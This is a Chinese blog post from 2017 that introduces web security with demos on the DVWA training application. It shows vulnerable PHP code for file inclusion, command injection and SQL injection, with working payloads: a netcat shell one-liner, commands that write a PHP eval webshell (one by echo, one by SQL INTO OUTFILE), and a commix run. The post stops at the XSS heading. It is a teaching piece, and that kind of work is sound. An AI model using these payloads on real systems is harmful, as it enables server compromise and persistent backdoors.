<!DOCTYPE html>



  



<html class="theme-next pisces use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  
    
      
    

    
  

  

  
    
      
    

    
  

  
    
      
    

    
  

  
    
    
    <link href="//fonts.lug.ustc.edu.cn/css?family=Monda:300,300italic,400,400italic,700,700italic|Roboto Slab:300,300italic,400,400italic,700,700italic|Lobster Two:300,300italic,400,400italic,700,700italic|PT Mono:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.2" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="Web,Demo," />








  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.1.2" />






<meta name="description" content="写在前面  开放式Web应用程序安全项目公布的十大WEB安全漏洞OWASP TOP 10 2017   WEB安全三境界 Tools User   工具小子对各种漏洞原理浅浅了解，缺乏Web站点开发与运维经验能力，缺乏对HTTP协议的掌握，只能略读懂（甚至不懂）一种或多种脚本语言。通常只会使用别人开发的攻击测试工具（以Windows GUI为主），以猜测弱口令、自主利用“BB型”漏洞或者使用他人漏">
<meta name="keywords" content="Web,Demo">
<meta property="og:type" content="article">
<meta property="og:title" content="Web安全扫盲Demo">
<meta property="og:url" content="http://yoursite.com/2017/09/19/Web-Security-Demo/index.html">
<meta property="og:site_name" content="Area of Mental Flow">
<meta property="og:description" content="写在前面  开放式Web应用程序安全项目公布的十大WEB安全漏洞OWASP TOP 10 2017   WEB安全三境界 Tools User   工具小子对各种漏洞原理浅浅了解，缺乏Web站点开发与运维经验能力，缺乏对HTTP协议的掌握，只能略读懂（甚至不懂）一种或多种脚本语言。通常只会使用别人开发的攻击测试工具（以Windows GUI为主），以猜测弱口令、自主利用“BB型”漏洞或者使用他人漏">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://img.mp.itc.cn/upload/20170417/9286692719ce46c1829a3c16486942c3_th.jpeg">
<meta property="og:image" content="http://yoursite.com/2017/09/19/Web-Security-Demo/1.png">
<meta property="og:updated_time" content="2017-09-22T14:17:13.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Web安全扫盲Demo">
<meta name="twitter:description" content="写在前面  开放式Web应用程序安全项目公布的十大WEB安全漏洞OWASP TOP 10 2017   WEB安全三境界 Tools User   工具小子对各种漏洞原理浅浅了解，缺乏Web站点开发与运维经验能力，缺乏对HTTP协议的掌握，只能略读懂（甚至不懂）一种或多种脚本语言。通常只会使用别人开发的攻击测试工具（以Windows GUI为主），以猜测弱口令、自主利用“BB型”漏洞或者使用他人漏">
<meta name="twitter:image" content="http://img.mp.itc.cn/upload/20170417/9286692719ce46c1829a3c16486942c3_th.jpeg">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.2',
    sidebar: {"position":"left","display":"post","offset":12,"offset_float":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2017/09/19/Web-Security-Demo/"/>





  <title>Web安全扫盲Demo | Area of Mental Flow</title>
  








</head>


<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  
  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Area of Mental Flow</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">Learning & Hacking</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2017/09/19/Web-Security-Demo/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="ba1fuf3ng">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/uploads/av.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Area of Mental Flow">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Web安全扫盲Demo</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2017-09-19T22:04:26+08:00">
                2017-09-19
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/Hacking/" itemprop="url" rel="index">
                    <span itemprop="name">Hacking</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h3 id="写在前面"><a href="#写在前面" class="headerlink" title="写在前面"></a>写在前面</h3><p><img src="http://img.mp.itc.cn/upload/20170417/9286692719ce46c1829a3c16486942c3_th.jpeg" alt=""></p>
<blockquote>
<p>开放式Web应用程序安全项目公布的十大WEB安全漏洞<br><a href="https://www.owasp.org/index.php/Top_10_2017-Top_10" target="_blank" rel="external">OWASP TOP 10 2017</a> </p>
</blockquote>
<h4 id="WEB安全三境界"><a href="#WEB安全三境界" class="headerlink" title="WEB安全三境界"></a>WEB安全三境界</h4><ul>
<li><p>Tools User   工具小子<br>对各种漏洞原理浅浅了解，缺乏Web站点开发与运维经验能力，缺乏对HTTP协议的掌握，只能略读懂（甚至不懂）一种或多种脚本语言。通常只会使用别人开发的攻击测试工具（以Windows GUI为主），以猜测弱口令、自主利用“BB型”漏洞或者使用他人漏洞利用脚本工具为自豪感来源。</p>
</li>
<li><p>Scripts Maker 脚本小子<br>对各种漏洞原理基本掌握，具备一定的Web站点开发与运维经验能力，基本掌握HTTP协议，能够简单审计至少一种脚本语言。能够按照实际需求开发WEB攻击测试脚本，了解浏览器安全</p>
</li>
<li><p>Web Hacker 安全研究员/WEB黑客<br>深谙各种漏洞原理，具备丰富的Web站点开发与运维经验能力，熟悉HTTP协议，具备独立审计WEB应用并发现0day漏洞的能力，研究浏览器安全。能够按照需求开发WEB攻击测试框架。</p>
</li>
<li><p>Master 大师<br>研究WEB安全前沿领域，培养WEB安全人才。</p>
</li>
</ul>
<a id="more"></a>
<h4 id="WEB应用服务体系与攻击测试步骤"><a href="#WEB应用服务体系与攻击测试步骤" class="headerlink" title="WEB应用服务体系与攻击测试步骤"></a>WEB应用服务体系与攻击测试步骤</h4><p><img src="/2017/09/19/Web-Security-Demo/1.png" alt="WEB应用服务体系"></p>
<hr>
<h3 id="WEB安全漏洞演示-Baby-Demo"><a href="#WEB安全漏洞演示-Baby-Demo" class="headerlink" title="WEB安全漏洞演示 Baby Demo"></a>WEB安全漏洞演示 Baby Demo</h3><p>我们将展示基于PHP+MySQL（目前广泛用于中小型站点）的WEB应用漏洞利用过程。展示在<a href="http://www.dvwa.co.uk/index.php" target="_blank" rel="external">Damn Vulnerable Web Application</a>(DVWA) Version 1.9上进行。虽然DVWA于2015-09-19发布1.9版本后再更新，但仍然是比较好WEB安全入门测试平台。</p>
<h4 id="一、信息泄露类"><a href="#一、信息泄露类" class="headerlink" title="一、信息泄露类"></a>一、信息泄露类</h4><h4 id="（一）文件包含漏洞"><a href="#（一）文件包含漏洞" class="headerlink" title="（一）文件包含漏洞"></a>（一）文件包含漏洞</h4><p>PHP文件包含漏洞的产生原因是在通过PHP的函数引入文件时，由于传入的文件名没有经过合理的校验，从而操作了预想之外的文件，就可能导致意外的文件泄露甚至恶意的代码注入。</p>
<ul>
<li>漏洞发现<ol>
<li>引用本站或站外某个功能点</li>
<li>找到传递的参数(get/post)，查看是否有包含的关系</li>
</ol>
</li>
</ul>
<ul>
<li>示例漏洞代码</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&lt;?php</span> </div><div class="line"></div><div class="line"><span class="comment">// The page we wish to display </span></div><div class="line">$file = $_GET[ <span class="string">'page'</span> ]; </div><div class="line"></div><div class="line"><span class="meta">?&gt;</span> </div><div class="line"></div><div class="line"><span class="meta">&lt;?php</span> <span class="keyword">include</span>($file); <span class="meta">?&gt;</span></div></pre></td></tr></table></figure>
<blockquote>
<p>include()：The include statement includes and evaluates the specified file.包含文件，并正确执行，若是找不到包含的文件，路径有问题时，会警告，但不会停止运行。</p>
</blockquote>
<ul>
<li>Payload:<br><code>file=file_path_youwant</code></li>
</ul>
<h4 id="二、注入类"><a href="#二、注入类" class="headerlink" title="二、注入类"></a>二、注入类</h4><h5 id="（一）命令与代码注入漏洞-Command-Code-Injection"><a href="#（一）命令与代码注入漏洞-Command-Code-Injection" class="headerlink" title="（一）命令与代码注入漏洞 Command/Code Injection"></a>（一）命令与代码注入漏洞 Command/Code Injection</h5><ul>
<li><p>漏洞发现</p>
<ol>
<li>是否能调用系统命令或者php函数</li>
<li>查找传递的参数(get/post)</li>
</ol>
</li>
<li><p>示例漏洞代码</p>
</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&lt;?php</span> </div><div class="line"></div><div class="line"><span class="keyword">if</span>( <span class="keyword">isset</span>( $_POST[ <span class="string">'Submit'</span> ]  ) ) &#123; </div><div class="line">    <span class="comment">// Get input </span></div><div class="line">    $target = $_REQUEST[ <span class="string">'ip'</span> ]; </div><div class="line"></div><div class="line">    <span class="comment">// Determine OS and execute the ping command. </span></div><div class="line">    <span class="keyword">if</span>( stristr( php_uname( <span class="string">'s'</span> ), <span class="string">'Windows NT'</span> ) ) &#123; </div><div class="line">        <span class="comment">// Windows </span></div><div class="line">        $cmd = shell_exec( <span class="string">'ping  '</span> . $target ); </div><div class="line">    &#125; </div><div class="line">    <span class="keyword">else</span> &#123; </div><div class="line">        <span class="comment">// *nix </span></div><div class="line">        $cmd = shell_exec( <span class="string">'ping  -c 4 '</span> . $target ); </div><div class="line">    &#125; </div><div class="line"></div><div class="line">    <span class="comment">// Feedback for the end user </span></div><div class="line">    <span class="keyword">echo</span> <span class="string">"&lt;pre&gt;&#123;$cmd&#125;&lt;/pre&gt;"</span>; </div><div class="line">&#125; </div><div class="line"></div><div class="line"><span class="meta">?&gt;</span></div></pre></td></tr></table></figure>
<blockquote>
<p>shell_exec() — Execute command via shell and return the complete output as a string</p>
</blockquote>
<ul>
<li>利用姿势:</li>
</ul>
<ol>
<li><p>反弹shell</p>
<p><code>1;mkfifo /tmp/e;sh /tmp/e | nc -nlp 2333 &gt; /tmp/e</code></p>
</li>
<li><p>写入webshell<br><code>1;echo &#39;&lt;?php eval($_POST[&quot;c&quot;]);?&gt;&#39; &gt; ws.php</code></p>
</li>
<li><p>利用commix自动测试</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">python commix.py --url=&quot;http://172.17.205.232:89/vulnerabilities/exec/#&quot; --data=&quot;ip=INJECT_HERE&amp;submit=submit&quot;  --cookie=&quot;PHPSESSID=sh36ods5unj4lqfuuojohp0o44;security=low&quot;</div></pre></td></tr></table></figure>
</li>
</ol>
<h5 id="（二）-SQL注入漏洞"><a href="#（二）-SQL注入漏洞" class="headerlink" title="（二） SQL注入漏洞"></a>（二） SQL注入漏洞</h5><p>SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序，而这些输入大都是SQL语法里的一些组合，通过执行SQL语句进而执行攻击者所要的操作，其主要原因是程序没有细致地过滤用户输入的数据，致使非法数据侵入系统。</p>
<ul>
<li>示例代码</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div></pre></td><td class="code"><pre><div class="line"></div><div class="line"><span class="meta">&lt;?php</span> </div><div class="line"></div><div class="line"><span class="keyword">if</span>( <span class="keyword">isset</span>( $_REQUEST[ <span class="string">'Submit'</span> ] ) ) &#123; </div><div class="line">    <span class="comment">// Get input </span></div><div class="line">    $id = $_REQUEST[ <span class="string">'id'</span> ]; </div><div class="line"></div><div class="line">    <span class="comment">// Check database </span></div><div class="line">    $query  = <span class="string">"SELECT first_name, last_name FROM users WHERE user_id = '$id';"</span>; </div><div class="line">    $result = mysql_query( $query ) <span class="keyword">or</span> <span class="keyword">die</span>( <span class="string">'&lt;pre&gt;'</span> . mysql_error() . <span class="string">'&lt;/pre&gt;'</span> ); </div><div class="line"></div><div class="line">    <span class="comment">// Get results </span></div><div class="line">    $num = mysql_numrows( $result ); </div><div class="line">    $i   = <span class="number">0</span>; </div><div class="line">    <span class="keyword">while</span>( $i &lt; $num ) &#123; </div><div class="line">        <span class="comment">// Get values </span></div><div class="line">        $first = mysql_result( $result, $i, <span class="string">"first_name"</span> ); </div><div class="line">        $last  = mysql_result( $result, $i, <span class="string">"last_name"</span> ); </div><div class="line"></div><div class="line">        <span class="comment">// Feedback for end user </span></div><div class="line">        <span class="keyword">echo</span> <span class="string">"&lt;pre&gt;ID: &#123;$id&#125;&lt;br /&gt;First name: &#123;$first&#125;&lt;br /&gt;Surname: &#123;$last&#125;&lt;/pre&gt;"</span>; </div><div class="line"></div><div class="line">        <span class="comment">// Increase loop count </span></div><div class="line">        $i++; </div><div class="line">    &#125; </div><div class="line"></div><div class="line">    mysql_close(); </div><div class="line">&#125; </div><div class="line"></div><div class="line"><span class="meta">?&gt;</span></div></pre></td></tr></table></figure>
<ul>
<li>利用姿势：</li>
</ul>
<ol>
<li><p>查看信息</p>
<p><code>&#39;union select user(),database() #</code></p>
</li>
</ol>
<ol>
<li><p>拿shell(需要知道绝对路径和写权限)</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">&apos;union select 1,&apos;&lt;?php eval($_POST[cmd]);?&gt;&apos; INTO OUTFILE &apos;/var/www/dvwa/cmd.php&apos; #</div></pre></td></tr></table></figure>
</li>
<li><p>使用sqlmap测试（略）</p>
</li>
</ol>
<h4 id="三、前端类"><a href="#三、前端类" class="headerlink" title="三、前端类"></a>三、前端类</h4><h4 id="（一）跨站脚本攻击漏洞"><a href="#（一）跨站脚本攻击漏洞" class="headerlink" title="（一）跨站脚本攻击漏洞"></a>（一）跨站脚本攻击漏洞</h4>
      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Web/" rel="tag"># Web</a>
          
            <a href="/tags/Demo/" rel="tag"># Demo</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2017/09/19/hello-world/" rel="next" title="归档日志">
                <i class="fa fa-chevron-left"></i> 归档日志
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2017/09/21/“联考复习计划“/" rel="prev" title="“联考复习计划“">
                “联考复习计划“ <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          
            <img class="site-author-image" itemprop="image"
              src="/uploads/av.jpg"
              alt="ba1fuf3ng" />
          
            <p class="site-author-name" itemprop="name">ba1fuf3ng</p>
            <p class="site-description motion-element" itemprop="description">柏浮锋-CST</p>
        </div>

        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
            
              <a href="/archives/">
            
                <span class="site-state-item-count">4</span>
                <span class="site-state-item-name">日志</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-categories">
              <a href="/categories/index.html">
                <span class="site-state-item-count">2</span>
                <span class="site-state-item-name">分类</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-tags">
              <a href="/tags/index.html">
                <span class="site-state-item-count">2</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="https://github.com/ba1fuf3ng" target="_blank" title="GitHub">
                  
                    <i class="fa fa-fw fa-github"></i>GitHub</a>
              </span>
            
              <span class="links-of-author-item">
                <a href="mailto:ba1fuf3ng@gmail.com" target="_blank" title="E-Mail">
                  
                    <i class="fa fa-fw fa-envelope"></i>E-Mail</a>
              </span>
            
          
        </div>

        
        
          <div class="cc-license motion-element" itemprop="license">
            <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" class="cc-opacity" target="_blank">
              <img src="/images/cc-by-nc-sa.svg" alt="Creative Commons" />
            </a>
          </div>
        

        
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#写在前面"><span class="nav-number">1.</span> <span class="nav-text">写在前面</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#WEB安全三境界"><span class="nav-number">1.1.</span> <span class="nav-text">WEB安全三境界</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#WEB应用服务体系与攻击测试步骤"><span class="nav-number">1.2.</span> <span class="nav-text">WEB应用服务体系与攻击测试步骤</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#WEB安全漏洞演示-Baby-Demo"><span class="nav-number">2.</span> <span class="nav-text">WEB安全漏洞演示 Baby Demo</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#一、信息泄露类"><span class="nav-number">2.1.</span> <span class="nav-text">一、信息泄露类</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#（一）文件包含漏洞"><span class="nav-number">2.2.</span> <span class="nav-text">（一）文件包含漏洞</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#二、注入类"><span class="nav-number">2.3.</span> <span class="nav-text">二、注入类</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#（一）命令与代码注入漏洞-Command-Code-Injection"><span class="nav-number">2.3.1.</span> <span class="nav-text">（一）命令与代码注入漏洞 Command/Code Injection</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#（二）-SQL注入漏洞"><span class="nav-number">2.3.2.</span> <span class="nav-text">（二） SQL注入漏洞</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#三、前端类"><span class="nav-number">2.4.</span> <span class="nav-text">三、前端类</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#（一）跨站脚本攻击漏洞"><span class="nav-number">2.5.</span> <span class="nav-text">（一）跨站脚本攻击漏洞</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy;  2016 &mdash; 
  <span itemprop="copyrightYear">2017</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">ba1fuf3ng</span>

  
</div>


        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>

  
  <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.2"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.2"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.2"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.2"></script>



  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.2"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.2"></script>


  

  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.2"></script>



  


  




	





  





  








  





  

  

  

  

  

  

  
  <script type="text/javascript" src="//cdn.bootcss.com/canvas-nest.js/1.0.1/canvas-nest.min.js"></script>
    


</body>
</html>
